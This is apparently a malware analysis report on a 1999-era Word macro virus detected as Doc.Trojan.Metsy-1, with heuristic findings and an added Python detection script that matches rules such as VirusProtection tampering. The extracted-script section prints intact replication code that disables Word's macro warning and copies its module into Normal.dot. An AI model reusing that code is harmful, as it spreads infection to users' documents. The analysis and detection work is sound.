Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ec41557a9840d86…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 47.0 KB
Created: 1999-10-20 14:01:00
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2012-06-14
MD5: 042d549ead81dc35ed88a60029c37444
SHA-1: 00a144f35dc37dd447c3d604eb9e54917816e3fc
SHA-256: 2ec41557a9840d86545556d0e2bc25f502e3fd353eef48ef8442ee1e12d22e8e
Risk score: 196

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample shows high-confidence macro-virus indicators: VBA macros, a legacy WordBasic ToolsMacro stub, and a Document_Close handler that disables Word's macro-virus warning (Options.VirusProtection = False), suppresses the Normal template save prompt, and then copies its own module between the document and Normal.dot through the VBE object model (VBComponents(1).Export to C:\System.dat, CodeModule.AddFromFile, four DeleteLines calls to trim the first lines of the imported text, Kill of the temporary file) before saving the document in place. The 55-line threshold on the Normal template and the zero-line check on the active document decide the direction of infection, so once Normal.dot is infected every document closed afterwards is infected in turn. ClamAV's critical detection as Doc.Trojan.Metsy-1 ties the file to a known variant. The Document_Open handler is a "Happy Birthday Jess" dice game whose losing branch rewrites the first word of the document as "YOU LOSE! " and saves it; the AutoClose and ToolsMacro bodies survive only as fragments in the extracted source, interleaved with residual print-job comment lines.

Heuristics (6)

  • ClamAV: Doc.Trojan.Metsy-1 [critical] CLAMAV_DETECTION
    ClamAV signature match on this file: Doc.Trojan.Metsy-1
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    The document carries a VBA project with macro code.
  • VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION
    The VBA code rewrites VBA project code through the VBE object model (CodeModule InsertLines/DeleteLines/AddFromString/AddFromFile, VBComponents Export, or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Word's macro-virus warning (Options.VirusProtection = False). This is the defining behaviour of the W97M macro-virus family: self-replicating code with no benign document use, flagged independently of any AV signature. In this sample the replication path is VBComponents(1).Export to C:\System.dat, CodeModule.AddFromFile and four DeleteLines calls, run against either NormalTemplate.VBProject or ActiveDocument.VBProject depending on which side is not yet infected. Modern Office refuses VBProject access unless "Trust access to the VBA project object model" is enabled, so the technique is dated, but the indicator remains decisive for classification.
    Matched line in script
    Options.VirusProtection = False
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open event handler, run automatically when the document is opened; here it holds the dice-game payload.
    Matched line in script
    Private Sub Document_Open()
  • AutoClose macro [low] OLE_VBA_AUTOCLOSE
    AutoClose macro, run automatically by Word when the document is closed; in this sample its body survives only as a fragment, and the replication logic sits in the separate Document_Close handler.
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    The OLE Word document contains legacy WordBasic auto-execution macro markers (AutoOpen together with ToolsMacro/MacroFile/fileMacro/globMacro) or named historical macro-virus strings. These Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them; a byte-level search of the raw file for the marker names is the check to run alongside extraction. Here the decoded source also shows a Sub ToolsMacro() stub beside AutoClose.
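The heuristics above are simple enough to reproduce. The following Python is an added example for this page (it is not the analysis platform's own code): it runs the same rule ideas over decoded VBA source, with rule names copied from this report, plus a raw-byte scan for the legacy WordBasic marker names that a VBA-only extraction misses. It assumes the source has already been decoded, for instance with oletools (`olevba sample.doc`, or `VBA_Parser(path).extract_macros()` in Python); SAMPLE_VBA and SAMPLE_RAW are constructed inputs modelled on the Document_Close handler shown in the extracted script, not the sample's real bytes. Treating Document_Close as an auto-close handler and the verdict thresholds are this example's choices.

```python
"""Macro-virus triage over decoded VBA source and raw OLE bytes, using the rule names of
this report. Added example for this page; the SAMPLE_* inputs are constructed."""
from __future__ import annotations
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    line_no: int   # 1-based line in the VBA source; 0 for file-level (raw byte) hits
    evidence: str

SUB = r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
# Treating Document_Close as an auto-close handler, like AutoClose, is this example's choice.
AUTO_EXEC = {
    "OLE_VBA_DOCOPEN": re.compile(SUB + r"Document_Open\s*\(", re.I),
    "OLE_VBA_AUTOCLOSE": re.compile(SUB + r"(?:AutoClose|Document_Close)\s*\(", re.I),
    "OLE_VBA_AUTOOPEN": re.compile(SUB + r"(?:AutoOpen|AutoExec|AutoNew)\s*\(", re.I),
}
VBE_MODEL = re.compile(r"\bVBProject\b.*\bVBComponents\b", re.I)
MODULE_WRITE = re.compile(r"\b(?:AddFromFile|AddFromString|InsertLines|DeleteLines|OrganizerCopy|Export)\b", re.I)
AV_TAMPER = re.compile(r"\bOptions\s*\.\s*VirusProtection\s*=\s*False\b", re.I)
LEGACY_AUTO = ("AutoOpen", "AutoClose", "AutoExec", "AutoNew", "AutoExit")
LEGACY_TOOL = ("ToolsMacro", "MacroFile", "FileMacro", "GlobMacro")
RANK = {"low": 0, "medium": 1, "high": 2, "critical": 3}

def scan_vba_source(src: str) -> list[Finding]:
    """Line scan of decoded VBA. Full-line comments are skipped, so stream residue
    such as this sample's print-job comment lines cannot trigger a rule."""
    findings, saw_model, writes = [], False, []
    for n, raw in enumerate(src.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("'") or line.lower().startswith("rem "):
            continue
        for rule, rx in AUTO_EXEC.items():
            if rx.search(raw):
                findings.append(Finding(rule, "low", n, line))
        if AV_TAMPER.search(raw):
            findings.append(Finding("OLE_VBA_MACRO_VIRUS_REPLICATION", "critical", n, line))
        saw_model = saw_model or bool(VBE_MODEL.search(raw))
        if MODULE_WRITE.search(raw):
            writes.append((n, line))
    # Replication needs both a handle into a VBProject and a call that dumps or rewrites
    # module code through it; report the first such call once.
    if saw_model and writes:
        findings.append(Finding("OLE_VBA_MACRO_VIRUS_REPLICATION", "critical", *writes[0]))
    return findings

def find_legacy_markers(data: bytes) -> dict[str, list[int]]:
    """Case-insensitive byte scan for WordBasic macro names in 8-bit and UTF-16LE form;
    Word 6/95 macros are not a VBA project, so source extraction alone misses them."""
    hay, hits = data.lower(), {}   # bytes.lower() touches ASCII only, which is all we need
    for name in LEGACY_AUTO + LEGACY_TOOL:
        for enc in ("latin-1", "utf-16-le"):
            needle, start = name.lower().encode(enc), 0
            while (i := hay.find(needle, start)) != -1:
                hits.setdefault(name, []).append(i)
                start = i + 1
    return {k: sorted(v) for k, v in hits.items()}

def legacy_wordbasic_finding(data: bytes) -> Finding | None:
    """Fires on an auto-macro name together with a ToolsMacro/MacroFile-style name."""
    hits = find_legacy_markers(data)
    auto = [n for n in LEGACY_AUTO if n in hits]
    tool = [n for n in LEGACY_TOOL if n in hits]
    if auto and tool:
        return Finding("OLE_LEGACY_WORDBASIC_MACRO_VIRUS", "high", 0, f"auto={auto} tool={tool}")
    return None

def triage(src: str, raw: bytes = b"") -> tuple[str, list[Finding]]:
    """Verdict in the report's style: critical -> MALICIOUS, high/medium -> SUSPICIOUS,
    low only -> INFO, nothing -> CLEAN."""
    findings = scan_vba_source(src)
    if raw and (legacy := legacy_wordbasic_finding(raw)):
        findings.append(legacy)
    if not findings:
        return "CLEAN", findings
    top = max(RANK[f.severity] for f in findings)
    return {3: "MALICIOUS", 2: "SUSPICIOUS", 1: "SUSPICIOUS", 0: "INFO"}[top], findings

# Constructed excerpt modelled on this report's Document_Close handler (not the sample's bytes).
SAMPLE_VBA = r"""Sub AutoClose()
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
Private Sub Document_Open()
     MsgBox "Happy Birthday Jess! We're going to see how lucky you are " & Application.UserName
Private Sub Document_Close()
Options.VirusProtection = False
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
ActiveDocument.VBProject.VBComponents(1).Export "C:\System.dat"
host.codemodule.AddFromFile ("C:\System.dat")
host.codemodule.deletelines 1
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
"""
SAMPLE_RAW = (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8   # OLE2 magic + padding
              + b"AutoOpen\x00" + "ToolsMacro".encode("utf-16-le") + b"\x00" * 4)
```

Calling `triage(SAMPLE_VBA, SAMPLE_RAW)` yields the MALICIOUS verdict with the replication rule fired twice (once on the Options.VirusProtection line, once on the first VBProject write) and the legacy rule fired from the raw bytes alone. The raw scan is deliberately crude, so it also lights up on an ordinary VBA project whose names sit uncompressed somewhere in the file; treat it as a triage signal that says "look at the streams", not as a verdict by itself.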

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   9382 bytes
SHA-256: 035a5acfa07e9d80318066b0f7c2d87c7b009d26a2903fe5cb72e48ac8d4b855
Preview script
First 1,000 lines of the extracted script. The decoded module is interleaved with residual comment lines carrying old print-job strings (Bellingham Public Schools printer paths), and the AutoClose, ToolsMacro and Document_Open bodies are fragmentary; only Document_Close, the replication routine, is intact.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
    For x = 1 To 4
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
Sub ToolsMacro()
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
'Bellingham Public Schools5/6/99 10:25:56 AMrm#110 printer on \\R2D2\RM#110poems.doc
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
Private Sub Document_Open()
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
     MsgBox "Happy Birthday Jess! To celebrate, we're going to see how lucky you are " & Application.UserName & ". Click the OK button below to roll a number. If your number matches that of the dealer, you win!"
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
     Y = Int((9 * Rnd) + 1)
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
               MsgBox "You roll a " & x & " and the dealer rolls a " & Y & ". You win!"
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
          Else
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
               For i = 1 To 14
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
                    x = x & RndNumber
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
                    ActiveDocument.Words.First = "YOU LOSE! "
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
                    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
          End If
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc
Exit Sub
'BELLINGHAM SCHOOLS6/8/99 11:15:28 AMHP LaserJet 4M on \\C3PO\RM#108poems.doc

Private Sub Document_Close()
On Error GoTo out
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If nt > 55 And ad > 0 Then GoTo out
If nt < 55 Then
     Set host = NormalTemplate.VBProject.VBComponents.Item(1)
     ActiveDocument.VBProject.VBComponents(1).Export "C:\System.dat"
     host.codemodule.AddFromFile ("C:\System.dat")
     With host.codemodule
     For x = 1 To 4
     .deletelines 1
     Next x
     End With
     Kill ("C:\System.dat")
End If
If ad = 0 Then
     Set host = ActiveDocument.VBProject.VBComponents.Item(1)
     NormalTemplate.VBProject.VBComponents(1).Export "C:\System.dat"
     host.codemodule.AddFromFile ("C:\System.dat")
     With host.codemodule
     For x = 1 To 4
     .deletelines 1
     Next x
     End With
     Kill ("C:\System.dat")
End If
out:
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub